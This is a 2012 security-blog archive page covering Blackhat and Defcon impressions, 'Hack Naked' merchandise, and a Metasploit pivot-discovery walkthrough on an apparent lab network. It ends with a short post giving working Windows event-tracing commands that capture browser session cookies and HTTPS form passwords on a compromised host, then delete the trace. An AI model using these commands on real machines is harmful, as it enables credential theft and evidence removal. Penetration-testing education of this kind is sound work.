
July 2012 Archives

Top 10 Things I Learned at Blackhat 2012 & Defcon 20 and Vegas


This year I'm making just one epic top ten list. After 8 days in the Vegas desert, which included four days of training, two days of Blackhat and three days of Defcon, I learned a lot about many things, including myself:

[Image: Johnstand]

There are two things wrong, er right, here: John did do a lot of standing, and he is not Paul. All joking aside, the folks at Blackhat rock and both the training and briefings are extremely well done. Huge thanks to all of the Blackhat staff!

  1. It's Not About You - I heard this quote recently, something along the lines of "All quarrels begin with selfishness". I spoke with a lot of people, and the most enjoyable folks to talk to were the ones that truly wanted to give and make the community a better place. The ones that do things because it's the right thing to do, and don't expect anything in return. My advice to folks is to fit this into your career somehow; even if it's a small slice, everyone will benefit. Of course, Johnny Long and the entire Hackers For Charity crew have made it a huge portion of their mission to help others, which is so awesome. We try to help HFC as much as we can, and so should you!

    [Image: Reversectf]

    Tim got bored in class and wrote an application to keep track of team scores for the Offensive Countermeasures reverse CTF (in like his sleep or something, Tim is an AMAZING programmer!). In the "reverse CTF" the teachers hack into students' virtual machines (with permission of course) and the students are encouraged to hack us back.

  2. NFC Is Really Neat - Charlie Miller gave a great talk on NFC technologies embedded in a few different model phones. The attacks required that you be in proximity to your victim; however, it underscores just how bad security is on mobile devices.

    [Image: Johnteaching]

    John is also an amazing instructor. I truly believe that if the entire slide deck were nothing but lolcatz the students would still walk away with tons of knowledge, rate the course really high and talk about how awesome the class was for them.

  3. The Community Is Stronger Than Ever - The fact that each year both Blackhat and Defcon seem to grow in number is one indication that we have a great community. It means more people want to be a part of it, which is awesome. However, we have to hold a high standard. Jericho gave a great talk at Blackhat about policing our own, making sure that the community is aware of "false profits" and other such notions. This is important work, and we all need to do our best to support our community and call bullshit when we see it.

    [Image: Ben]

    It was great hanging out with Ben; make sure you go grab the latest version of his wireless honeypot called "Claymore".

  4. I Love Python - I spent some time with both Ben Jackson and Tim Tomes over the weekend of Blackhat training. While John Strand did the hard work of training, Tim, Ben and I did some good ol' fashioned "geekin' out". I learned more about Python and made some contributions to Ben's wireless honeypot project. In the end, I love Python (the debugger alone sets it apart from many other languages).

    [Image: Badpassword]

    Part of the problem with embedded device security is that the developers don't even LET you try to make it secure. W-T-F Asus!

  5. The Loud Minority Will Remain The Minority - This concept I borrowed from the cigar industry. I got talking to some of the folks that are behind making some of the finest cigars in the industry. They all say the same thing: if they listened to the "loud minority" they would be out of business. The hardcore cigar enthusiast wants certain things, specific blends, sizes and shapes of cigars. If they catered to this group, they'd go out of business; while it's loud, it's still the minority. The security industry has a similar group of people, and while I totally appreciate and respect people's opinions, I try to fit it into the larger picture.

    [Image: Cooltoy]

    HFC had this really cool rifle-style wireless hacking thing. It had every kind of wireless toy on it, including ninja remotes and just about every other toy from Deal Extreme.

  6. There Will Always Be One Porn Star At Defcon - I won't post it here, but I always end up with at least one picture to use in my presentations where at least one person is from the adult film industry. You will just have to wait until one of us presents in the proper setting to see the picture ;)

    [Image: Davidblackhat]

    The largest Blackhat I saw in Vegas.

  7. "Hack Naked" Is A Great Filter - When people see the term "Hack Naked", there are a few typical reactions. Having displayed this phrase proudly at Defcon to over 15,000 people, I feel like I can define a few of them. Some just laugh, and that's all they do. They giggle and smile, and then just keep walking, almost like when you see someone with their fly down or toilet paper stuck to their shoe when they come out of the bathroom. It's cute and funny, and that is all. The next group finds it so funny and interesting that they want to be a part of it. They pick up a sticker and buy a shirt and wear it proudly. If you ask them "Why Hack Naked?", they'd say "Who cares, that shit is funny". These are the folks we like to hang out with, coincidentally. The final group are the ones who are offended. I'm not sure if it's the idea of someone sitting at a computer naked or the mudflap girl image, but it's clear they are offended. Society today is far too easily offended, and if the mere suggestion of someone being naked offends you, get over it, we all came into this world naked. Furthermore, there are far worse things to promote than being naked. I can't help but think of a quote I read from an interview with Robin Williams, who said that when faced with the choice of their children seeing violence on TV or a love scene, the choice is clear: let them see the love scene! (And no, I'm not suggesting you let your kids watch porn.)

    [Image: Dcbooth]

    Our "booth babe" got lots of attention; mostly people were frightened by the 6' tall cardboard cutout of Larry, naked, holding only a WRT54G wireless router.

  8. Cigars Make Friends - In a way, I kinda felt like King Edward VII of England who, after assuming the throne from his mother, Queen Victoria, who had previously banned smoking in court, stated: "Gentlemen, you may smoke." It's no secret I love to smoke cigars, and it was great to share that with many friends, both old and new.

    [Image: Pussycat]

    I smoked a cigar called the "Pussycat", couldn't resist! In the back is one of my new friends, thanks to our shared passion for cigars!

  9. We Still Have A Huge Embedded Device Security Problem - I sat in on one of the talks at Blackhat on embedded device hacking. It's still the same story: poor security controls, poor coding, poor security feature implementations (stack has ASLR, but heap overflows still work).

    [Image: Weirdshowerwindow]

    Sharing a room with Dave "The AV guy" when there is a window between the shower and the bedroom is, well, weird.

  10. Our Listeners Rule - Just sayin', you all rock. I met so many listeners at both conferences and just wanted to again thank you for listening. We really appreciate your support, and more than ever are committed to sharing knowledge with the community in an entertaining way.

"Hack Naked" Gear Sneak Preview


Do you "Hack Naked"? Want to tell the world that you do? Most people ask me "Why Hack Naked?", to which I respond "Why not?". This year at Defcon, and select other conferences such as Derbycon, we will have for sale all brand new "Hack Naked" gear.

All the designs are freshly updated, including some awesome ideas from the PaulDotCom crew (special thanks to Larry Pesce for his creativity and hard work with all the artwork):

Keep Calm and Hack Naked

Here's a sign you're getting old: I didn't get it at first. Then, once Larry explained it to me, it made sense. Now, I see all the "young folks" wearing "keep calm" themed shirts. I wore one of our new shirts when I went to a store, and got two compliments from younger folk working behind the counter. So, check out our latest design available in black and red from sizes M-XXL:

[Image: IMG 4016]

We also are sporting a new "Hack Naked" T-shirt design:

[Image: IMG 4015]

Since we always get the question "What is Hack Naked?" the back on both shirts above looks like this:

[Image: Tshirt red keep naked]

We also have brand new ladies sleepwear, in both pink and white lettering. They make a great gift for that special lady, or just to lounge in when you want to feel pretty:

[Image: IMG 4017]

And we are sporting all new Post-Exploitation Clean-up Towels featuring the "Hack Naked" logo, for all of your post-exploitation clean-up needs:

[Image: IMG 4018]

Finally we brought back the giant bumper stickers! These bad boys are 10" x 3":

[Image: IMG 4013]

We will also have toddler Hack Naked shirts (2T, 3T and 4T sizes), baseball jerseys and a very special guest at the table, I guess you could call it a "booth babe".

Come by our table at Defcon for special deals, all shirts will be $10 and you get two shirts for $15 (excluding XXL sizes).

Recently I have been working more and more on my pentest plugin for Metasploit, fixing bugs and improving some of its existing areas. I added the Auto Exploit plugin to it for exploit automation, and added some commands to aid enumeration and discovery through a pivot.

I was talking with the guys at Defensive Intuition and Black Hills Defensive Security, and one of the areas they wanted to see covered in the plugin was being able to quickly move on to enumerating and scanning other targets once they get a Meterpreter session on a client's network. So I added two commands to the plugin to help with this.

Let's start with a session that is connected to a host that is behind NAT:

msf > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01  192.168.1.100:4444 -> 192.168.1.138:49323 (10.10.10.2)

msf >

Let's start by loading the plugin:

msf >  load pentest

       ___         _          _     ___ _           _
      | _ \___ _ _| |_ ___ __| |_  | _ \ |_  _ __ _(_)_ _
      |  _/ -_) ' \  _/ -_|_-<  _| |  _/ | || / _` | | ' \
      |_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
                                              |___/
			
Version 1.2
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]darkoperator.com)
[*] Successfully loaded plugin: pentest
msf  exploit(handler) > back
msf >

As shown in my other posts about the plugin, it adds commands to the list of commands available in the console. To see the available commands we can just enter the help command or ?:

msf > help
. . . .
Discovery Commands
==================

    Command                 Description
    -------                 -----------
    discover_db             Run discovery modules against current hosts in the database.
    network_discover        Performs a portscan and enumeration of services found for non pivot networks.
    pivot_network_discover  Performs enumeration of networks available to a specified Meterpreter session.
    show_session_networks   Enumerate the networks one could pivot thru Meterpreter in the active sessions.
. . . .

The commands we have available are:

* discover_db - this command goes through the hosts present in the database and runs a set of modules to enumerate and gather information from the services that have been detected on those hosts. One can provide a range of hosts to limit the discovery, and SMB settings for the SMB modules that will be run against the hosts.

* network_discover - runs the Nmap scanner against a given CIDR. If no ports are specified it determines the ports used by Metasploit auxiliary and exploit modules and uses those; after running the scan it runs additional discovery modules to further enumerate and gather information from those services.

* pivot_network_discover - this command enumerates all interfaces and routes on a given Windows Meterpreter session and creates routes to the found networks through that session. It determines which of the enumerated networks are directly connected to the host and which are remote, so as to pick the best way to detect hosts: if the network is directly connected it does an ARP sweep, since this provides the most accuracy, and if the network is a remote one it executes a ping scan against it. If specified, it executes a TCP and UDP port scan against the hosts it discovered; if a port list is not provided it auto-generates one from the auxiliary and exploit modules currently available, plus some additional common ports. If specified, it launches discovery modules to further enumerate the services found.

* show_session_networks - lists the networks available through Windows Meterpreter sessions.
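The directly-connected versus remote decision described for pivot_network_discover, worked through as an added Ruby example (written for this page, not the plugin's own code): interface and route data are constructed to resemble the lab above, the handler address 192.168.1.100 comes from the sessions listing, and the 10.10.20.0/24 route behind 10.10.10.1 is invented to show the remote case.

```ruby
require 'ipaddr'

# Constructed sample (not from the page): what a Windows Meterpreter session
# might report for its interfaces and routing table.
INTERFACES = [
  { ip: '192.168.1.138', netmask: '255.255.255.0' }, # side the session came in on
  { ip: '10.10.10.2',    netmask: '255.255.255.0' }, # internal network
].freeze

ROUTES = [
  { subnet: '0.0.0.0',         netmask: '0.0.0.0',         gateway: '192.168.1.1' },
  { subnet: '10.10.10.0',      netmask: '255.255.255.0',   gateway: '10.10.10.2' },
  { subnet: '10.10.20.0',      netmask: '255.255.255.0',   gateway: '10.10.10.1' }, # behind a router (invented)
  { subnet: '127.0.0.0',       netmask: '255.0.0.0',       gateway: '127.0.0.1' },
  { subnet: '169.254.0.0',     netmask: '255.255.0.0',     gateway: '10.10.10.2' },
  { subnet: '192.168.1.0',     netmask: '255.255.255.0',   gateway: '192.168.1.138' },
  { subnet: '224.0.0.0',       netmask: '240.0.0.0',       gateway: '10.10.10.2' },
  { subnet: '255.255.255.255', netmask: '255.255.255.255', gateway: '10.10.10.2' },
].freeze

# Address the Metasploit handler connects from, as shown by "sessions" (assumed).
HANDLER_IP = '192.168.1.100'

# Number of set bits in a dotted-quad netmask, e.g. 255.255.255.0 -> 24.
def prefix_length(netmask)
  IPAddr.new(netmask).to_i.to_s(2).count('1')
end

# "10.10.10.0/24" style key; IPAddr masks the host bits off for us.
def network_key(address, netmask)
  plen = prefix_length(netmask)
  "#{IPAddr.new("#{address}/#{plen}")}/#{plen}"
end

# Routes that never identify a network worth sweeping.
def skip_route?(subnet, netmask, handler_ip)
  plen = prefix_length(netmask)
  return true if plen.zero? || plen == 32                   # default route, host route
  net = IPAddr.new("#{subnet}/#{plen}")
  return true if IPAddr.new('127.0.0.0/8').include?(net)    # loopback
  return true if IPAddr.new('169.254.0.0/16').include?(net) # link-local
  return true if IPAddr.new('224.0.0.0/4').include?(net)    # multicast
  net.include?(IPAddr.new(handler_ip))                      # network we already pivot over
end

# Returns a Hash like { "10.10.10.0/24" => :arp_sweep, "10.10.20.0/24" => :ping_sweep }.
# A network that matches one of the host's own interfaces is on the same
# segment, so ARP gives the most accurate host detection; anything else is
# only reachable through a gateway and has to be ping-swept.
def classify_networks(interfaces, routes, handler_ip)
  local = interfaces.map { |i| network_key(i[:ip], i[:netmask]) }
  routes.each_with_object({}) do |r, out|
    next if skip_route?(r[:subnet], r[:netmask], handler_ip)
    key = network_key(r[:subnet], r[:netmask])
    out[key] = local.include?(key) ? :arp_sweep : :ping_sweep
  end
end

if __FILE__ == $PROGRAM_NAME
  classify_networks(INTERFACES, ROUTES, HANDLER_IP).each do |net, method|
    puts "#{net.ljust(18)} #{method}"
  end
end
```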

Let's start by listing the networks available through a session. First, let's look at the options available for the show_session_networks command:

msf > show_session_networks -h
This command will show the networks that can be routed thru a Meterpreter session.

OPTIONS:

    -h        Help Message.
    -s   Sessions to enumerate networks against. Example  or .


Now lets list the networks available:

msf > show_session_networks -s all
Network     Netmask        Session
-------     -------        -------
10.10.10.0  255.255.255.0  1

Now that we know the networks connected to the session, we can check the options available for the pivot_network_discover command:

msf > pivot_network_discover -h

OPTIONS:

    -D   SMB Domain for discovery(optional).
    -P   SMB Password for discovery(optional).
    -U   SMB Username for discovery(optional).
    -d        Run Framework discovery modules against found hosts.
    -h        Help Message.
    -p   Port list. Provide a comma separated list of port and/or ranges to TCP scan.
    -s   Session to do discovery of networks and hosts.
    -t        Perform TCP port scan of hosts discovered.
    -u        Perform UDP scan of hosts discovered.
    -v        Be verbose and show pending actions.


Let's see what information we have in our current workspace for hosts, services and notes:

msf > hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > services

Services
========

host  port  proto  name  state  info
----  ----  -----  ----  -----  ----

msf > notes
msf >

Let's run a discovery through the current session we have:

 msf > pivot_network_discover -t -u -d -s 1
[*] Identifying networks to discover
[*] Routing new subnet 10.10.10.0/255.255.255.0 through session 1
[*] Running windows/gather/arp_scanner against 1

[*] Running module against WIN2K3LAB01
[*] ARP Scanning 10.10.10.0/24
[*] 	IP: 10.10.10.2 MAC 00:0c:29:5e:e3:bd
[*] 	IP: 10.10.10.1 MAC 00:0c:29:4d:e7:5a
[*] 	IP: 10.10.10.200 MAC 00:0c:29:45:73:cb
[*] 	IP: 10.10.10.201 MAC 00:0c:29:c9:15:98
[*] 	IP: 10.10.10.239 MAC 00:0c:29:1e:8d:30
[*] 	IP: 10.10.10.238 MAC 00:0c:29:10:5c:d7
[*] 	IP: 10.10.10.243 MAC 00:0c:29:2e:97:ff
[*] Generating list of ports used by Auxiliary Modules
[*] Generating list of ports used by Exploit Modules
[*] Discovering 10.10.10.0/24 Network
[+] Running TCP Portscan against 10.10.10.2
[+] Running TCP Portscan against 10.10.10.1
[+] Running TCP Portscan against 10.10.10.200
[+] Running TCP Portscan against 10.10.10.201
[+] Running TCP Portscan against 10.10.10.239
[+] Running TCP Portscan against 10.10.10.238
[+] Running TCP Portscan against 10.10.10.243
[+] Running UDP Portscan against 10.10.10.2
[+] Running UDP Portscan against 10.10.10.1
[+] Running UDP Portscan against 10.10.10.200
[*] 10.10.10.1:80 - TCP OPEN
[*] 10.10.10.243:514 - TCP OPEN
[*] 10.10.10.2:445 - TCP OPEN
[*] 10.10.10.243:111 - TCP OPEN
[*] 10.10.10.243:445 - TCP OPEN
[*] 10.10.10.239:23 - TCP OPEN
[*] 10.10.10.243:23 - TCP OPEN
[*] 10.10.10.243:21 - TCP OPEN
[*] 10.10.10.2:135 - TCP OPEN
[*] 10.10.10.243:1099 - TCP OPEN
[*] 10.10.10.243:80 - TCP OPEN
[*] 10.10.10.243:22 - TCP OPEN
[*] 10.10.10.243:513 - TCP OPEN
[*] 10.10.10.2:389 - TCP OPEN
[*] 10.10.10.239:135 - TCP OPEN
[*] 10.10.10.243:25 - TCP OPEN
[*] 10.10.10.201:135 - TCP OPEN
[*] 10.10.10.200:445 - TCP OPEN
[*] 10.10.10.200:135 - TCP OPEN
[*] 10.10.10.243:512 - TCP OPEN
[*] 10.10.10.239:445 - TCP OPEN
[*] 10.10.10.238:445 - TCP OPEN
[*] 10.10.10.238:135 - TCP OPEN
[*] Discovered NTP on 10.10.10.2:123 (1c0104fa00000000000a0da14c4f434cd3b1d5bebfd032b2c54f234b71b152f3d3b1e271bbb79f3ed3b1e271bbb79f3e)
[*] Discovered DNS on 10.10.10.1:53 (403e858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435)
[*] Discovered NetBIOS on 10.10.10.200:137 (WINXPLAB01::U :VICTIMLAB::G :WINXPLAB01::U :VICTIMLAB::G :00:0c:29:45:73:cb)

. . . .

[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[-] File doesn't seem to exist. The upload probably failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243 (Apache/2.2.8 (Ubuntu) DAV/2) WebDAV disabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Scanned 1 of 1 hosts (100% complete)
[*] waiting for some modules to finish
msf >
[*] 10.10.10.243:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 10.10.10.243:5900, VNC server protocol version : 3.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:5900, VNC server security types supported : VNC
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:5432 Postgres - Version 8.3.8 (Pre-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.239:23 Does not support encryption: Welcome to Microsoft Telnet Service \x0a\x0a\x0dlogin:
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:23 Does not support encryption: _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)

msf >

One thing to keep in mind: scanning through a pivot is slow. That is why I decided to go with the generated list of ports, since these give the best chances to leverage the tools and modules in the framework. For large networks I recommend also using the -v option to see how many scanner jobs are pending.

Now that we have finished the discovery, let's look at the hosts, services and notes we now have:

msf > hosts

Hosts
=====

address       mac                name             os_name            os_flavor        os_sp  purpose  info  comments
-------       ---                ----             -------            ---------        -----  -------  ----  --------
10.10.10.1    00:0c:29:4d:e7:5a  10.10.10.1       Unknown                                    device
10.10.10.2    00:0c:29:5e:e3:bd  win2k3lab01      Microsoft Windows  2003             SP2    server
10.10.10.200  00:0c:29:45:73:cb  winxplab01       Microsoft Windows  XP               SP2    client
10.10.10.201  00:0c:29:c9:15:98                   Unknown                                    device
10.10.10.238  00:0c:29:10:5c:d7  win-yr4v852v71y  Microsoft Windows  2008 Enterprise  SP1    server
10.10.10.239  00:0c:29:1e:8d:30  test-01bcdaf47c  Microsoft Windows  XP               SP2    client
10.10.10.243  00:0c:29:2e:97:ff  metasploitable   Linux              Debian                  server

msf > services

Services
========

host          port   proto  name      state  info
----          ----   -----  ----      -----  ----
10.10.10.1    53     udp    dns       open   403e858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435
10.10.10.1    80     tcp    http      open   lighttpd/1.4.23
10.10.10.2    135    tcp              open
10.10.10.2    123    udp    ntp       open   1c0104fa00000000000a0da14c4f434cd3b1d5bebfd032b2c54f234b71b152f3d3b1e271bbb79f3ed3b1e271bbb79f3e
10.10.10.2    53     udp    dns       open   Microsoft DNS
10.10.10.2    137    udp    netbios   open   WIN2K3LAB01::U :VICTIMLAB::G :VICTIMLAB::G :WIN2K3LAB01::U :VICTIMLAB::U :VICTIMLAB::G :VICTIMLAB::U :__MSBROWSE__::G :00:0c:29:5e:e3:bd
10.10.10.2    3389   tcp              open
10.10.10.2    445    tcp    smb       open   Windows 2003 Service Pack 2 (language: Unknown) (name:WIN2K3LAB01) (domain:VICTIMLAB)
10.10.10.2    389    tcp              open
10.10.10.200  123    udp    ntp       open   1c020efa00000000001000000a0a0a02d3b17b6e0454d46dc54f234b71b152f3d3b1e2508240cefdd3b1e2508240cefd
10.10.10.200  135    tcp              open
10.10.10.200  3389   tcp              open
10.10.10.200  445    tcp    smb       open   Windows XP Service Pack 2 (language: English) (name:WINXPLAB01) (domain:VICTIMLAB)
10.10.10.200  137    udp    netbios   open   WINXPLAB01::U :VICTIMLAB::G :WINXPLAB01::U :VICTIMLAB::G :00:0c:29:45:73:cb
10.10.10.201  135    tcp              open
10.10.10.238  137    udp    netbios   open   WIN-YR4V852V71Y::U :WORKGROUP::G :WIN-YR4V852V71Y::U :00:0c:29:10:5c:d7
10.10.10.238  135    tcp              open
10.10.10.238  445    tcp    smb       open   Windows 2008 Enterprise Service Pack 1 (language: Unknown) (name:WIN-YR4V852V71Y) (domain:WORKGROUP)
10.10.10.239  23     tcp    telnet    open   Welcome to Microsoft Telnet Service \x0a\x0a\x0dlogin:
10.10.10.239  123    udp    ntp       open   Microsoft NTP
10.10.10.239  135    tcp              open
10.10.10.239  137    udp    netbios   open   TEST-01BCDAF47C::U :WORKGROUP::G :TEST-01BCDAF47C::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :00:0c:29:1e:8d:30
10.10.10.239  445    tcp    smb       open   Windows XP Service Pack 2 (language: English) (name:TEST-01BCDAF47C) (domain:WORKGROUP)
10.10.10.243  80     tcp    http      open   Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
10.10.10.243  22     tcp    ssh       open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
10.10.10.243  23     tcp    telnet    open   _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
10.10.10.243  25     tcp    smtp      open   220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

10.10.10.243  21     tcp    ftp       open   220 (vsFTPd 2.3.4)\x0d\x0a
10.10.10.243  111    udp    portmap   open   100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(55600), 100024 v1 TCP(53257), 100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 100021 v1 UDP(58825), 100021 v3 UDP(58825), 100021 v4 UDP(58825), 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 100021 v1 TCP(47361), 100021 v3 TCP(47361), 100021 v4 TCP(47361), 100005 v1 UDP(40587), 100005 v1 TCP(42089), 100005 v2 UDP(40587), 100005 v2 TCP(42089), 100005 v3 UDP(40587), 100005 v3 TCP(42089)
10.10.10.243  111    tcp    sunrpc    open   100000 v2
10.10.10.243  137    udp    netbios   open   METASPLOITABLE::U :METASPLOITABLE::U :METASPLOITABLE::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00
10.10.10.243  139    tcp              open
10.10.10.243  445    tcp    smb       open   Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
10.10.10.243  512    tcp              open
10.10.10.243  513    tcp              open
10.10.10.243  514    tcp              open
10.10.10.243  1099   tcp              open
10.10.10.243  1524   tcp              open
10.10.10.243  2049   udp    sunrpc    open   100003 v4
10.10.10.243  2049   tcp    sunrpc    open   100003 v4
10.10.10.243  3306   tcp    mysql     open   5.0.51a-3ubuntu5
10.10.10.243  3632   tcp              open
10.10.10.243  5432   tcp    postgres  open   8.3.8
10.10.10.243  5900   tcp    vnc       open   VNC protocol version 3.3
10.10.10.243  6000   tcp              open
10.10.10.243  6667   tcp              open
10.10.10.243  6697   tcp              open
10.10.10.243  8180   tcp              open
10.10.10.243  8787   tcp              open
10.10.10.243  40587  udp    sunrpc    open   100005 v3
10.10.10.243  42089  tcp    sunrpc    open   100005 v3
10.10.10.243  47361  tcp    sunrpc    open   100021 v4
10.10.10.243  53257  tcp    sunrpc    open   100024 v1
10.10.10.243  55600  udp    sunrpc    open   100024 v1
10.10.10.243  58825  udp    sunrpc    open   100021 v4

msf > notes
[*] Time: 2012-07-19 01:35:46 UTC Note: host=10.10.10.2 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:35:47 UTC Note: host=10.10.10.200 service=smb type=smb.fingerprint data={:os_flavor=>"Windows XP", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"English"}
[*] Time: 2012-07-19 01:36:03 UTC Note: host=10.10.10.239 service=smb type=smb.fingerprint data={:os_flavor=>"Windows XP", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"English"}
[*] Time: 2012-07-19 01:36:05 UTC Note: host=10.10.10.200 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:16 UTC Note: host=10.10.10.238 service=smb type=smb.fingerprint data={:os_flavor=>"Windows 2008 Enterprise", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 1", :os_lang=>"Unknown"}
[*] Time: 2012-07-19 01:36:22 UTC Note: host=10.10.10.239 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:28 UTC Note: host=10.10.10.243 service=smb type=smb.fingerprint data={:os_flavor=>"Unix", :os_name=>"Unknown", :os_sp=>"Samba 3.0.20-Debian"}
[*] Time: 2012-07-19 01:36:33 UTC Note: host=10.10.10.238 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:34 UTC Note: host=10.10.10.243 service=139/tcp type=smb.domain.enumusers data={:sid_txt=>"5-21-1042354039-2475377354-766472396", :pass_min=>5, :pass_min_history=>0, :server_role=>3, :lockout_threshold=>0, :lockout_duration=>1480786430454, :lockout_window=>1480786430454, :users=>{1010=>"games", 501=>"nobody", 1210=>"bind", 1026=>"proxy", 1204=>"syslog", 3002=>"user", 1066=>"www-data", 1000=>"root", 1018=>"news", 1216=>"postgres", 1004=>"bin", 1016=>"mail", 1222=>"distccd", 1226=>"proftpd", 1202=>"dhcp", 1002=>"daemon", 1208=>"sshd", 1012=>"man", 1014=>"lp", 1218=>"mysql", 1082=>"gnats", 1200=>"libuuid", 1068=>"backup", 3000=>"msfadmin", 1224=>"telnetd", 1006=>"sys", 1206=>"klog", 1212=>"postfix", 3004=>"service", 1076=>"list", 1078=>"irc", 1214=>"ftp", 1220=>"tomcat55", 1008=>"sync", 1020=>"uucp"}, :name=>"METASPLOITABLE"}
[*] Time: 2012-07-19 01:36:36 UTC Note: host=10.10.10.243 service=139/tcp type=smb.shares data={:shares=>[["print$", "DISK", "Printer Drivers"], ["tmp", "DISK", "oh noes!"], ["opt", "DISK", ""], ["IPC$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"], ["ADMIN$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"]]}
[*] Time: 2012-07-19 01:35:33 UTC Note: host=10.10.10.2 service=smb type=smb.fingerprint data={:os_flavor=>"Windows 2003", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"Unknown"}

I hope you find these new commands useful.

ETW (Event Tracing for Windows) is pretty awesome. You can do all kinds of crazy cool stuff with it. For example, imagine you've just exploited your target and found that the CFO is using IE to browse to the company's internal ERP (Enterprise Resource Planning) system. Showing the executives that you've got access to the financials is a great way to demonstrate risk in terms that are understood on mahogany row. You need to steal his cookie, but it is non-persistent (memory only, not on disk), the session is SSL encrypted and it was negotiated before you got on his machine. Windows Event Tracing to the rescue. First you turn on event tracing for the WinInet provider.

cd \temp
logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

Then you let your target do a little web browsing and wait for the goods to show up in your new "cookiesteal.etl" event log.

After a few minutes you grab the goods!!

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

And it isn't just cookies that are recorded in the event log. You can capture all the POST information that is passed back and forth, including passwords from FORM based HTTPS sites!

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

Or you could do some additional reconnaissance by looking at DNS requests, proxy information, DNS cache snooping and more.

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

When you're done you simply turn off your event logging and delete your event log.

logman stop CookieStealer -ets
del cookiesteal.etl

Have fun.

Join me for SANS 504 Hacker Techniques, Exploits & Incident Handling, November 27th - December 2nd 2012 in lovely San Antonio, Texas.

Mark Baggett
On Twitter  @markbaggett

